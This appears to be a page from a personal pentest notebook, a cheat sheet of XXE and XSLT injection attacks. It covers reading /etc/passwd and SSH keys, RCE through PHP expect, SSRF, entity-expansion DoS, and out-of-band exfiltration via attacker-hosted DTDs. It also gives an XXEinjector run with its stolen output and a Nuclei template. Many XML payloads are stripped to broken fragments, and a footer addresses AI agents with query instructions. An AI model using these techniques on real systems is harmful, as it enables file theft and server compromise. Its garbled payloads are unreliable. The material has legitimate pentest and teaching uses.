# XXE / XSLT [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) {% embed url="" %} ```xml ]> ``` {% hint style="info" %} *We may also use the PUBLIC keyword instead of SYSTEM for loading external resources, which is used with publicly declared entities and standards, such as a language code (lang="en").* {% endhint %} ## Detection In your proxy interceptor, add a match\&replace rule to change content type "application/json" to "text/xml" All you have to do now is look for XML parsing errors
```xml ]> ```
{% hint style="success" %} *Note: Some web applications may default to a JSON format in HTTP request, but may still accept other formats, including XML. So, even if a web app sends requests in a JSON format, we can try changing the `Content-Type` header to `application/xml`, and then convert the JSON data to XML with an* [*online tool*](https://www.convertjson.com/json-to-xml.htm)*. If the web application does accept the request with XML data, then we may also test it against XXE vulnerabilities, which may reveal an unanticipated XXE vulnerability.* {% endhint %} Change content type "application/json" to "application/xml"
Burp Extension - Content Type Converter {% embed url="" %} {% embed url="" %} ## Read File ```xml ]> ```
``` # Etc/passwd ]> &read; # .ssh/Id_rsa ]> &read; ``` Read the content of sensitive files, like configuration files that may contain passwords or other sensitive files like an `id_rsa` SSH key of a specific user Read the source code of the web application {% hint style="info" %} Tip: In certain Java web applications, we may also be able to specify a directory instead of a file, and we will get a directory listing instead, which can be useful for locating sensitive files. See [Basic XXE](#classic) {% endhint %} If a file contains some of XML's special characters (e.g. `<`/`>`/`&`), it would break the external entity reference and not be used for the reference. Furthermore, we cannot read any binary data, as it would also not conform to the XML format. Solution for PHP app: Base64 ```xml ]> ```
PHP Filters: {% content-ref url="/pages/JrFm2DfMRvUJ0bx03YhO" %} [File Inclusion LFI / RFI](/0xss0rz/pentest/web-attacks/file-inclusion-lfi-rfi.md) {% endcontent-ref %} For Java app, see [Bad characters - wrapper](#bad-characters-wrapper-dtd-cdata) ### Using SVG Image ```svg ]>&xxe; ``` ## Remote Code Execution with XXE `PHP://expect` filter ```shell-session $ echo '' > shell.php $ sudo python3 -m http.server 80 ``` ```xml ]> &company; ``` {% hint style="info" %} **Note:** We replaced all spaces in the above XML code with `$IFS`, to avoid breaking the XML syntax. Furthermore, many other characters like `|`, `>`, and `{` may break the code, so we should avoid using them {% endhint %} ## Other XXE Attacks Port scan, SSRF DoS: ```xml ]> &a10; ``` This attack no longer works with modern web servers (e.g., Apache), as they protect against entity self-reference ## Advanced Exfiltration with CDATA ```shell-session $ echo '' > xxe.dtd $ python3 -m http.server 8000 ``` ```xml "> %xxe; ]> ... &joined; ``` {% hint style="info" %} **Note:** In some modern web servers, we may not be able to read some files (like index.php), as the web server would be preventing a DOS attack caused by file/entity self-reference (i.e., XML entity reference loop), as mentioned in the previous section. {% endhint %} **See** [**Bad Character - Wrappers**](#bad-characters-wrapper-dtd-cdata) ## Error Based XXE
DTD file - xxe.dtd ```xml "> ``` payload ```xml %remote; %error; ]> ```
{% hint style="info" %} `This method is not as reliable as the previous method for reading source files`, as it may have length limitations, and certain special characters may still break it {% endhint %} ## Out-of-band Data Exfiltration Dtd file: ```xml "> ``` Payload: ```xml %remote; %oob; ]> &content; ``` {% hint style="info" %} **Tip:** In addition to storing our base64 encoded data as a parameter to our URL, we may utilize `DNS OOB Exfiltration` by placing the encoded data as a sub-domain for our URL (e.g. `ENCODEDTEXT.our.website.com`), and then use a tool like `tcpdump` to capture any incoming traffic and decode the sub-domain string to get the data. Granted, this method is more advanced and requires more effort to exfiltrate data through. {% endhint %} ### Automation - XXEInjector See [**Tools**](#tools) Copy the HTTP request from Burp and write it to a file. Not include the full XML data, only the first line, and write `XXEINJECT` after it as a position locator for the tool: ```http POST /blind/submitDetails.php HTTP/1.1 Host: 10.129.201.94 Content-Length: 169 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Content-Type: text/plain;charset=UTF-8 Accept: */* Origin: http://10.129.201.94 Referer: http://10.129.201.94/blind/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Connection: close XXEINJECT ``` ```shell-session ruby XXEinjector.rb --host=[tun0 IP] --httpport=8000 --file=/tmp/xxe.req --path=/etc/passwd --oob=http --phpfilter ...SNIP... [+] Sending request with malicious XML. [+] Responding with XML for: /etc/passwd [+] Retrieved data: ``` All exfiltrated files get stored in the `Logs` folder under the tool ```shell-session cat Logs/10.129.201.94/etc/passwd.log root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin ...SNIP.. ```
## Tools {% embed url="" %} After identifying a Blind XXE for example in Burpsuite it is pretty straight forward with this tool. Simply save the request into a file (req.txt for example) and insert XXEINJECT at the location of the identified injectible parameter.
{% embed url="" %} *** ## More payloads ### Basic XXE ``` ]> &xxe; ``` Lister des répertoires `file:///` : liste la racine `file:///home/` : liste /home ### XXE to SSRF ``` ]> &ssrf; ... ``` {% embed url="" %} ### Blind XXE {% embed url="" %} {% embed url="" %} Tool: [XXEInjector](#tools) #### Nuclei Template ``` id: blind-xxe info: name: Blind XXE author: geeknik,otterly severity: high variables: rletter: "{{rand_base(6,'oterly')}}" requests: - raw: - | POST {{Path}} HTTP/1.1 Host: {{Hostname}} User-Agent: Mozilla/5.0 (X11; Linux x88_64; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip,deflate Referer: {{BaseURL}} Content-Type: text/xml Content-Length: 112 Connection: close <{{rletter}}>&e1; redirects: true matchers: - type: word part: interactsh_protocol words: - "dns" - "http" condition: or ``` ### Out of Band {% embed url="" %} ### OOB Detection ```xml %ext; ]> ```
### OOB using SVG Image ```xml ]> &b; ``` ### DTD Exfiltration {% embed url="" %} ``` %dtd;]> &send; ``` ``` cat remote.dtd "> %all; ```
* **FTP** {% embed url="" %} ``` %asd; %c; ]> &rrr; ``` ``` # cat ftp.dtd "> ```
{% embed url="" %}
also:[ https://github.com/cyberaz0r/XXE-OOB-Exfiltrator](< https://github.com/cyberaz0r/XXE-OOB-Exfiltrator>) Not able to exfiltrate `/etc/passwd` over http, or ftp on java/tomcat:
{% embed url="" %} * **JAR Protocol:** * * * * ### Bad characters - Wrapper DTD - CDATA {% embed url="" %} {% embed url="" %} ``` cat wrapper.dtd ``` ``` "> %dtd; ]> &wrapper; ```
### Repurposing Loacl DTD {% embed url="" %} Find a local DTD to repurpose {% embed url="" %} {% embed url="" %} ``` "> %eval; %error; '> %local_dtd; ]> ``` ### RCE in PHP Try to use the expect package
### [Tools](#tool) ## Resources {% embed url="" %} {% embed url="" %} {% embed url="" %} *** ## XSLT Recon {% embed url="" %} ### Determine the Vendor and Version ``` ``` ```
Version:
Vendor:
Vendor URL: ``` ```

XSLT identification

Version:
Vendor:
Vendor URL:
 ``` ``` ``` ### Fingerprinting ``` Version:
Vendor:
Vendor URL:
Product Name:
Product Version:
Is Schema Aware ?:
Supports Serialization:
Supports Backwards Compatibility:
``` ## File Read
``` ``` ## XSS ``` ``` ## RCE
## SSRF ``` ``` ``` ``` ## Payloads {% embed url="" %} ## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp) [**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)
## Interesting Books {% content-ref url="/pages/VVT5FQq9z62bWoNAWCUS" %} [Interesting Books](/0xss0rz/interesting-books.md) {% endcontent-ref %} {% hint style="info" %} **Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you. {% endhint %} * [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more * [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them * [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery. ## Support this Gitbook I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it. [![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA) [![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz) ## Resources {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} {% embed url="" %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/xxe-xslt.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.